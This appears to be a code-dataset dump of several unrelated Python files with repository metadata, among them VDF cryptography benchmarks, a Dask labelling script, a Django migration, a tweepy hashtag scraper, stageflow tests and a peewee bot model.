] | null | null | null | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
] | 1 | 2021-08-06T14:21:13.000Z | 2021-08-06T14:21:13.000Z | import matplotlib.pyplot as plt
import pandas as pd
def scenarios_by_product(
X: "np.ndarray", indices: list, products: list, ax: plt.Axes = None
) -> plt.Axes:
"""Plot generated scenarios, with a subplot for each product"""
if ax is None:
_, ax = plt.subplots(X.shape[-1], 1, figsize=(8, X.shape[-1] * 2), sharex=True)
try:
iter(ax)
except TypeError:
ax = [ax]
for i, prod_i in enumerate(products):
pd.DataFrame(
X[:, :, i],
index=indices,
).plot(ax=ax[i], alpha=0.05, linewidth=3, legend=None, color="gray")
pd.DataFrame(X[:, :, i].mean(axis=1), index=indices, columns=["avg"]).plot(
ax=ax[i], alpha=0.8, linewidth=1, legend=None, color="blue"
)
ax[i].set_ylabel(prod_i)
return ax
| 27.266667 | 87 | 0.57335 | 119 | 818 | 3.890756 | 0.529412 | 0.025918 | 0.030238 | 0.056156 | 0.064795 | 0.064795 | 0 | 0 | 0 | 0 | 0 | 0.021631 | 0.265281 | 818 | 29 | 88 | 28.206897 | 0.748752 | 0.069682 | 0 | 0 | 1 | 0 | 0.027815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19975a6c0f70cdf1b6594a54b946673ec51a754 | 11,349 | py | Python | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 97 | 2018-10-04T18:10:42.000Z | 2021-08-23T10:37:06.000Z | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 4 | 2018-10-04T18:20:49.000Z | 2021-05-03T07:13:14.000Z | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 17 | 2018-10-08T18:08:21.000Z | 2022-01-12T00:54:32.000Z | import time
import textwrap
import math
import binascii
from inkfish.create_discriminant import create_discriminant
from inkfish.classgroup import ClassGroup
from inkfish.iterate_squarings import iterate_squarings
from inkfish import proof_wesolowski
from inkfish.proof_of_time import (create_proof_of_time_nwesolowski,
check_proof_of_time_nwesolowski,
generate_r_value)
from inkfish import proof_pietrzak
from tests.int_mod_n import int_mod_n
start_t = 0
time_multiplier = 1000 # Use milliseconds
def start_bench():
global start_t
start_t = time.time() * time_multiplier
def end_bench(name, iterations):
global start_t
print("%-80s" % name, round(((time.time() * time_multiplier) - start_t)
/ (iterations), 2), "ms")
def bench_classgroup():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 512 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 512 bit square", 10000)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 1024 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 1024 bit square", 10000)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 2048 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 2048 bit square", 10000)
def bench_discriminant_generation():
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 512)
end_bench("Generate 512 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 1024)
end_bench("Generate 1024 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 2048)
end_bench("Generate 2048 bit discriminant", 100)
def bench_vdf_iterations():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(10):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 512bit classgroup", 10)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 1024bit classgroup", 2)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 2048bit classgroup", 2)
# 2048 bit modulus
prime = int(''.join(textwrap.dedent("""
2634427397878110232503205795695468045251992992603340168049253044454387
1080897872360133472596339100961569230393163880927301060812730934043766
3646941725034559080490451986171041751558689035115943134790395616490035
9846986660803055891526943083539429058955074960014718229954545667371414
8029627597753998530121193913181474174423003742206534823264658175666814
0135440982296559552013264268674093709650866928458407571602481922443634
2306826340229149641664159565679297958087282612514993965471602016939198
7906354607787482381087158402527243744342654041944357821920600344804411
149211019651477131981627171025001255607692340155184929729""").split(
"\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 2048bit RSA modulus", 2)
# 4096 bit modulus
prime = int(''.join(textwrap.dedent("""
8466908771297228398108729385413406312941234872779790501232479567685076
4762372651919166693555570188656362906279057098994287649807661604067499
3053172889374223358861501556862285892231110003666671700028271837785598
2711897721600334848186874197010418494909265899320941516493102418008649
1453168421248338831347183727052419170386543046753155080120058844782449
2367606252473029574371603403502901208633055707823115620627698680602710
8443465519855901353485395338769455628849759950055397510380800451786140
7656499749760023191493764704430968335226478156774628814806959050849093
5035645687560103462845054697907307302184358040130405297282437884344166
7188530230135000709764482573583664708281017375197388209508666190855611
3020636147999796942848529907410787587958203267319164458728792653638371
7065019972034334447374200594285558460255762459285837794285154075321806
4811493971019446075650166775528463987738853022894781860563097254152754
1001763544907553312158598519824602240430350073539728131177239628816329
0179188493240741373702361870220590386302554494325819514615309801491107
2710093592877658471507118356670261129465668437063636041245619411937902
0658733974883998301959084381087966405508661151837877497650143949507846
1522640311670422105209760172585337397687461""").split("\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 4096bit RSA modulus", 2)
def bench_wesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
powers_to_calculate += [iterations]
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_wesolowski.generate_proof(identity, x, y, iterations, k, L, powers)
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 5)
proof_time = round((time.time() * time_multiplier - start_t) / 5)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_wesolowski.verify_proof(x, y, proof, iterations))
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_nwesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
start_t = time.time() * time_multiplier
for _ in range(20):
iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t) / 20
start_t = time.time() * time_multiplier
start_bench()
for _ in range(20):
result, proof = create_proof_of_time_nwesolowski(discriminant, x, iterations,
discriminant_length, 2, depth=0)
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, proof", 20)
proof_time = round((time.time() * time_multiplier - start_t) / 20)
print(" - Percentage of VDF time:", (((proof_time - vdf_time) / vdf_time) * 100), "%")
start_bench()
for _ in range(20):
assert(check_proof_of_time_nwesolowski(discriminant, x, result + proof, iterations, discriminant_length))
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, verification", 20)
def bench_pietrzak():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
delta = 8
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = proof_pietrzak.cache_indeces_for_count(iterations)
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_pietrzak.generate_proof(x, iterations, delta, y, powers,
identity, generate_r_value, discriminant_length)
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 10)
proof_time = round((time.time() * time_multiplier - start_t) / 10)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_pietrzak.verify_proof(x, y, proof, iterations, delta,
generate_r_value, discriminant_length))
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_main():
bench_classgroup()
bench_discriminant_generation()
bench_vdf_iterations()
bench_wesolowski()
bench_nwesolowski()
bench_pietrzak()
if __name__ == '__main__':
bench_main()
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| 38.602041 | 114 | 0.707639 | 1,225 | 11,349 | 6.32898 | 0.160816 | 0.028892 | 0.033535 | 0.03289 | 0.55385 | 0.542113 | 0.517864 | 0.502515 | 0.498904 | 0.466916 | 0 | 0.264093 | 0.201251 | 11,349 | 293 | 115 | 38.733788 | 0.591175 | 0.004406 | 0 | 0.542986 | 0 | 0 | 0.279564 | 0.172398 | 0 | 0 | 0 | 0 | 0.013575 | 1 | 0.040724 | false | 0 | 0.049774 | 0 | 0.090498 | 0.0181 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19995883a43664eea79cdbbf4ebcc8afcf1f9f2 | 2,415 | py | Python | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from load_for_ccl_inputs import load_for_ccl_inputs
from ccl_marker_stack import ccl_dask
base = '/home/mrilee/nobackup/tmp/others/'
fnames = None
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz']
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz']
if True:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz'
,'ccl-inputs-globe-122784+23.csv.gz'
,'ccl-inputs-globe-122808+23.csv.gz'
,'ccl-inputs-globe-122832+23.csv.gz'
,'ccl-inputs-globe-122856+23.csv.gz'
,'ccl-inputs-globe-122880+23.csv.gz'
,'ccl-inputs-globe-122904+23.csv.gz']
file_fpnames = [base+fname for fname in fnames]
print 'file_fpnames: ',file_fpnames
# quit()
###########################################################################
# Load
# precsno_arr, visibility_arr = load_for_ccl_inputs(file_name)
# For extinction, 1/visibility.
thresh_mnmx = (1.0e-3,1.0)
# The calculation
if True:
ccl_dask_object = ccl_dask()
ccl_dask_object.load_data_segments_with_loader(load_for_ccl_inputs,file_fpnames,[('visibility_i',np.nan,np.float)])
# Diagnostics
if False:
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
print 'execute'
ccl_dask_object.data_segs[0].result()
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
if True:
ccl_dask_object.make_stacks(thresh_mnmx)
ccl_dask_object.shift_labels()
ccl_dask_object.make_translations()
ccl_dask_object.apply_translations()
if False:
print 'ccl_dask_object.data_segs[0].results()[0]\n'\
,ccl_dask_object.data_segs[0].result()[0]
if True:
np.set_printoptions(threshold=5000,linewidth=600)
print 'ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]\n'\
,ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]
np.set_printoptions(threshold=1000,linewidth=75)
ccl_dask_object.close()
# Note, if we have to do the 3-hour blizzard calculation w/o CCL, then we can monkey with the load_data_segments to
# have files loaded onto separate cluster nodes, like ghost cells. Alternatively, we can Dask it by client.submitting
# tasks with dependencies on those two adjacent futures.
| 30.56962 | 119 | 0.670807 | 358 | 2,415 | 4.293296 | 0.332402 | 0.081978 | 0.135329 | 0.052049 | 0.424854 | 0.374105 | 0.296031 | 0.259597 | 0.233572 | 0.233572 | 0 | 0.065449 | 0.183851 | 2,415 | 78 | 120 | 30.961538 | 0.714358 | 0.171843 | 0 | 0.272727 | 0 | 0 | 0.308539 | 0.291252 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.068182 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19b6144712313556ed4af7f1913f9e90750f30c | 1,065 | py | Python | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 1 | 2021-01-19T00:48:10.000Z | 2021-01-19T00:48:10.000Z | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 17 | 2020-01-23T05:51:18.000Z | 2020-06-16T02:33:41.000Z | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 1 | 2020-08-06T02:10:58.000Z | 2020-08-06T02:10:58.000Z | # Generated by Django 3.0.2 on 2020-03-03 21:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('PropertyManagers', '0001_initial'),
('Properties', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tenant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=100)),
('lastName', models.CharField(max_length=100)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=20)),
('place', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Properties.Property')),
('pm', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PropertyManagers.PropertyManager')),
],
),
]
| 35.5 | 139 | 0.611268 | 110 | 1,065 | 5.818182 | 0.536364 | 0.05 | 0.1125 | 0.15 | 0.20625 | 0.121875 | 0.121875 | 0.121875 | 0 | 0 | 0 | 0.042447 | 0.247887 | 1,065 | 29 | 140 | 36.724138 | 0.756554 | 0.042254 | 0 | 0 | 1 | 0 | 0.145383 | 0.031434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.045455 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a21975ae4f7b1e5e6eec59130eae251c21b5f0 | 2,159 | py | Python | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | import json
import csv
import tweepy
from textblob import TextBlob
import nltk
from nltk.tokenize import word_tokenize
def search_for_hashtags(consumer_key, consumer_secret, access_token, access_token_secret, hashtag_phrase):
# create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# initialize Tweepy API
api = tweepy.API(auth)
# get the name of the spreadsheet we will write to
fname = "data"
string = " "
# open the spreadsheet we will write to
with open('%s.csv' % fname, 'w') as file:
w = csv.writer(file)
# write header row to spreadsheet
w.writerow(['timestamp', 'tweet_text', 'username',
'all_hashtags', 'followers_count', 'location'])
# for each tweet matching our hash tags, write relevant info to the spreadsheet
i = 1
for tweet in tweepy.Cursor(api.search, q=hashtag_phrase + ' -filter:retweets',
lang="en", tweet_mode='extended').items(5000):
string = string + tweet.full_text.replace('\n', ' ')
w.writerow([tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
print(i , [tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
i = i+1
print("Done")
#string = word_tokenize(string)
# print(nltk.pos_tag(string))
if __name__ == '__main__':
consumer_key =
consumer_secret =
access_token =
access_token_secret =
hashtag_phrase = 'geocode:27.466079,89.639010,30km'
search_for_hashtags(consumer_key, consumer_secret,
access_token, access_token_secret, hashtag_phrase)
| 38.553571 | 131 | 0.637332 | 270 | 2,159 | 4.888889 | 0.381481 | 0.075 | 0.064394 | 0.083333 | 0.481061 | 0.443939 | 0.40303 | 0.40303 | 0.40303 | 0.40303 | 0 | 0.017178 | 0.245021 | 2,159 | 55 | 132 | 39.254545 | 0.792638 | 0.148217 | 0 | 0.111111 | 0 | 0 | 0.11694 | 0.017486 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a4e4ea2b00add4c4b415ad7ce218f992351283 | 536 | py | Python | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup
import sys
setup(
name='grr',
version='0.2',
author='Kunal Mehta',
author_email='legoktm@gmail.com',
url='https://github.com/legoktm/grr/',
license='CC-0',
description='A command-line utility to work with Gerrit',
long_description=open('README.rst').read(),
packages=['grr'],
install_requires=['configparser'] if sys.version_info[0] == 2 else [],
entry_points={
'console_scripts': [
'grr = grr:main'
],
}
)
| 24.363636 | 74 | 0.613806 | 67 | 536 | 4.820896 | 0.776119 | 0.012384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014354 | 0.220149 | 536 | 21 | 75 | 25.52381 | 0.758373 | 0.039179 | 0 | 0 | 0 | 0 | 0.321012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a5a19351b24a513cab2db62b55e27e8f29e1d1 | 3,899 | py | Python | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | 3 | 2020-10-04T18:52:37.000Z | 2022-02-21T13:21:45.000Z | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | 2 | 2020-05-28T03:33:47.000Z | 2020-05-28T03:38:30.000Z | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | null | null | null | from stageflow import Flow
from stageflow import Stage
def test_create_stage():
Stage()
def test_create_flow_bare():
flow = Flow()
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set([])
def test_create_flow_and_add_stage():
flow = Flow()
flow.add_stage('test', Stage())
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_stage():
flow = Flow(stages=dict(test=Stage()))
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_initial_stage():
class TestStage():
def enter(self, data):
pass
def exit(self):
pass
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
)
assert flow.get_current_stage() is 'test'
assert set(flow.get_stages()) == set(['test'])
def test_transition_entry():
test_data = 'foo'
global passed_data
passed_data = None
class TestStage(Stage):
def enter(self, data):
global passed_data
passed_data = data
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
initial_stage_data=test_data,
)
assert passed_data == test_data
assert flow.get_current_stage() == 'test'
def test_transition_entry():
global has_exited
has_exited = False
exit_data = 'foo_bar_baz'
global entry_data
entry_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = data
def exit(self, data):
global has_exited
has_exited = True
return exit_data
flow = Flow(
stages=dict(
test_a=TestStage(),
test_b=TestStage(),
),
initial_stage='test_a',
)
assert flow.get_current_stage() == 'test_a'
assert entry_data is None
assert not has_exited
flow.transition('test_b')
assert flow.get_current_stage() == 'test_b'
assert entry_data == exit_data
assert has_exited
def test_pushing_substage():
global entry_data
entry_data = None
global exit_data
exit_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = 'stage'
def exit(self, data):
global exit_data
exit_data = 'stage'
def exit_to_substage(self, substage, data):
global exit_data
exit_data = 'stage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'stage'
class TestSubstage(Stage):
def enter(self, data):
global entry_data
entry_data = 'substage'
def exit(self, data):
global exit_data
exit_data = 'substage'
def exit_to_substage(self, data):
global exit_data
exit_data = 'substage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'substage'
flow = Flow(
stages=dict(test=TestStage()),
substages=dict(test_substage=TestSubstage()),
initial_stage='test',
)
assert exit_data is None
assert entry_data == 'stage'
assert flow.get_current_substage() is None
flow.push_substage('test_substage')
assert exit_data == 'stage'
assert entry_data == 'substage'
assert flow.get_current_substage() == 'test_substage'
flow.pop_substage()
assert exit_data == 'substage'
assert entry_data == 'stage'
assert flow.get_current_substage() is None
# FIXME: Now add the ways that Flow *shouldn't* be usable:
# * transitioning to non-existent stages
# * passing invalid objects to Flow(stages=...)
| 24.36875 | 58 | 0.616055 | 478 | 3,899 | 4.761506 | 0.138075 | 0.075132 | 0.057118 | 0.087873 | 0.651582 | 0.543497 | 0.445518 | 0.434095 | 0.41696 | 0.3058 | 0 | 0 | 0.286997 | 3,899 | 159 | 59 | 24.522013 | 0.818705 | 0.036163 | 0 | 0.546218 | 0 | 0 | 0.048748 | 0 | 0 | 0 | 0 | 0.006289 | 0.210084 | 1 | 0.176471 | false | 0.058824 | 0.016807 | 0 | 0.243697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
490a5d4dee030077442db885609423fe0007703e | 758 | py | Python | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | from menu import Menu, MenuEntry
from logic.cloudformation import CloudFormation
class CloudFormationCli:
"""
Menu for the AWS CloudFormation operations
"""
def __init__(self):
"""
Run the menu
"""
# Init the logic handler
self.cloudformation = CloudFormation()
# Init the menu
Menu('Amazon Web Services (AWS) Elastic Load Balancer', [
MenuEntry('Go back', None),
MenuEntry('Generate web bucket', self.generate_web_bucket),
]).run()
def generate_web_bucket(self):
"""
Generate a web bucket
"""
print '# Generating web bucket'
self.cloudformation.generate_web_bucket()
print 'Web bucket generated'
| 25.266667 | 71 | 0.604222 | 77 | 758 | 5.818182 | 0.415584 | 0.140625 | 0.151786 | 0.09375 | 0.129464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307388 | 758 | 29 | 72 | 26.137931 | 0.853333 | 0.047493 | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
490a7e4e927bf1f9002b7ce41d2b092342ed19da | 3,107 | py | Python | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from peewee import SqliteDatabase, Model, PrimaryKeyField, IntegerField, CharField, BooleanField, DateTimeField
from bot.data.config import STATIC_DIR
from bot.utils.logging import logger
db = SqliteDatabase(f"{STATIC_DIR}/db.sqlite3")
class User(Model):
"""
Клас описывающий поля в таблице для юзера
"""
id = PrimaryKeyField(null=False, unique=True)
user_id = IntegerField(null=False, unique=True)
full_name = CharField(null=False, max_length=255)
username = CharField(null=True, max_length=128)
is_subscribe = BooleanField(null=False, default=False)
created = DateTimeField(default=datetime.now())
def add_user(self, user_id: int, full_name: str, username: str) -> bool:
"""
Функция для добавления пользователя в Базу данных
:param user_id: ID пользователя в Телеграме
:param username: Имя пользователя
:param full_name: Полное имя аккаунта
:return:
"""
try:
return self.create(user_id=user_id,
full_name=full_name,
username=username)
except Exception as addUserError:
print(addUserError)
def get_user(self, user_id: int) -> [Model, bool]:
"""
Функция для проверки наличия пользователя в Базе Данных
:param user_id: ID пользователя в Телегрме
